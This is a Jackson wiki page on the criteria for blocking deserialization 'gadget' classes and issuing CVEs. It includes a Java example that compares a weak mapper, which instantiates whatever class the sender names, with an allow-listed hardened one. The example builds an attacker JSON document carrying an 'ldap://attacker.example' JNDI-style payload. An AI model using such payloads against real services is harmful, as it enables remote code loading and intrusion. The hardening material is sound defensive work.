Jackson Polymorphic Deserialization CVE Criteria
This page outlines the criteria used for accepting problems of the kind described in "On Jackson CVEs: Don't Panic!", that is, possible security issues that can arise when all of the following hold:
- Service accepts JSON content from untrusted senders AND
- Service enables the "Default Typing" feature (or uses equivalent `@JsonTypeInfo` with base type of `java.lang.Object`) AND
- Service has one of the 3rd-party libraries with known "gadget" Java classes on its classpath AND
- Jackson version is 2.9.x or lower
then there may be a security issue.
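The second condition is the one a service owner controls directly. The following Java example, added here as an illustration and not part of this wiki page or of jackson-databind itself, shows the weak form (a polymorphic `Object` field with no `PolymorphicTypeValidator`, where the sender's `@class` value decides which class is instantiated) next to the hardened 2.10+ form that allow-lists the expected payload types. The `Event`, `Greeting` and `SetterRecorder` classes, the JSON documents and the hostname are all constructed for the example; `SetterRecorder` stands in for a gadget and only records that its setter was reached.

```java
import com.fasterxml.jackson.annotation.JsonTypeInfo;
import com.fasterxml.jackson.databind.JsonMappingException;
import com.fasterxml.jackson.databind.ObjectMapper;
import com.fasterxml.jackson.databind.json.JsonMapper;
import com.fasterxml.jackson.databind.jsontype.BasicPolymorphicTypeValidator;
import com.fasterxml.jackson.databind.jsontype.PolymorphicTypeValidator;

public class DefaultTypingDemo {

    // Hypothetical DTO: polymorphic field whose declared base type is java.lang.Object.
    // Per the criteria above this is equivalent to enabling Default Typing for that field:
    // the "@class" property in the JSON decides which class gets instantiated.
    public static class Event {
        public String name;
        @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
        public Object payload;
    }

    // The only payload type this hypothetical service expects.
    public static class Greeting {
        public String text;
    }

    // Stand-in for a "gadget" class (constructed for this example). A real gadget does
    // something harmful in a constructor or setter, such as opening a JNDI/LDAP connection
    // to the attacker-supplied value; this one only records that Jackson reached its setter.
    public static class SetterRecorder {
        public static String lastTarget;
        public void setTarget(String target) { lastTarget = target; }
    }

    // Constructed attacker document: the sender picks the class name, Jackson does the rest.
    static final String ATTACKER_JSON =
        "{\"name\":\"hi\",\"payload\":{\"@class\":\"" + SetterRecorder.class.getName()
        + "\",\"target\":\"ldap://attacker.example:1389/x\"}}";

    // Constructed benign document naming the expected payload type.
    static final String BENIGN_JSON =
        "{\"name\":\"hi\",\"payload\":{\"@class\":\"" + Greeting.class.getName()
        + "\",\"text\":\"hello\"}}";

    // Weak configuration: no PolymorphicTypeValidator. On 2.9 this relies entirely on the
    // block list; on 2.10+ the default validator for annotation-based typing is permissive,
    // so the validator must be configured explicitly (below) to get allow-list behaviour.
    static ObjectMapper weakMapper() {
        return new ObjectMapper();
    }

    // Hardened configuration (2.10+): allow-list the concrete payload types. Any other
    // class named in "@class" is rejected before it is instantiated. The global equivalent
    // of enableDefaultTyping() is activateDefaultTyping(ptv, DefaultTyping.NON_FINAL).
    static ObjectMapper hardenedMapper() {
        PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
            .allowIfSubType(Greeting.class)
            .build();
        return JsonMapper.builder()
            .polymorphicTypeValidator(ptv)
            .build();
    }

    public static void main(String[] args) throws Exception {
        // 1. Weak mapper: the attacker-chosen class is instantiated and its setter called.
        Event e1 = weakMapper().readValue(ATTACKER_JSON, Event.class);
        System.out.println("weak mapper instantiated: " + e1.payload.getClass().getName()
            + ", setter saw: " + SetterRecorder.lastTarget);

        // 2. Hardened mapper: the same document is rejected with an InvalidTypeIdException
        //    (a JsonMappingException subclass) because SetterRecorder is not allow-listed.
        try {
            hardenedMapper().readValue(ATTACKER_JSON, Event.class);
            System.out.println("UNEXPECTED: hardened mapper accepted the gadget class");
        } catch (JsonMappingException ex) {
            System.out.println("hardened mapper rejected: " + ex.getOriginalMessage());
        }

        // 3. Hardened mapper still accepts the type the service actually uses.
        Event e2 = hardenedMapper().readValue(BENIGN_JSON, Event.class);
        System.out.println("hardened mapper accepted: " + ((Greeting) e2.payload).text);
    }
}
```

Run it with jackson-databind 2.10 or later on the classpath (2.9 lacks `BasicPolymorphicTypeValidator` and `JsonMapper`). The point of the allow-list is that it no longer matters which gadget libraries happen to be on the classpath: only `Greeting` (and its subtypes) can ever be resolved from a sender-supplied type id for that field.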
When such issues are reported, new checks are added to Jackson 2.9.x (2.10 and later have a separate prevention mechanism that does not rely on block lists) to prevent deserialization of the reported "gadget" types.
Original reports covered widely used Java libraries (such as EHCache, Spring Web or Hibernate), and one or two types were even found in (some versions of) the JDK itself. These could be expected to be security vulnerabilities for multiple projects and as such were worth blocking.
But maintaining these blocks and handling CVE ID requests, allocation and version releases has its cost, and because Jackson 2.10 and later are not considered vulnerable in the same sense, over time the effort of adding to the block list has exceeded its value for the maintainers. For context, the current block list (jackson-databind 2.9.10.6) contains about 90 specific classes across 30-40 libraries.
Starting September 15, 2020, new blocks will only be added (and CVE IDs allocated) for "gadget" types that are "notable", meaning inclusion in either:
- JDK version 1.8 (Java 8) or later (all valid gadget types are accepted and blocks added)
- Publicly available, "popular enough" artifact:
- Must be listed on MvnRepository.com
- Is depended on by at least 20 libraries (not including other components of the same framework, if part of larger set of artifacts)
Some existing blocks do not fulfill these criteria, but blocks that have been added previously will not be removed simply due to lack of popularity (or accessibility).
One particular class of no-longer-accepted cases is that of Application Server classes only available as part of an AS installation, unless they are accessible as artifacts via Maven Central (or similar publicly accessible and indexed Maven repositories).
Because newer minor versions are available (2.10.5 and 2.11.2 as of Sep 2, 2020), no new Jackson 2.9 releases, not even micro-patches, are planned after the end of 2020. An exception could always be made for some critical issue, but there are no plans to maintain the block list beyond whatever the last 2.9.10 micro-patch is on December 31, 2020.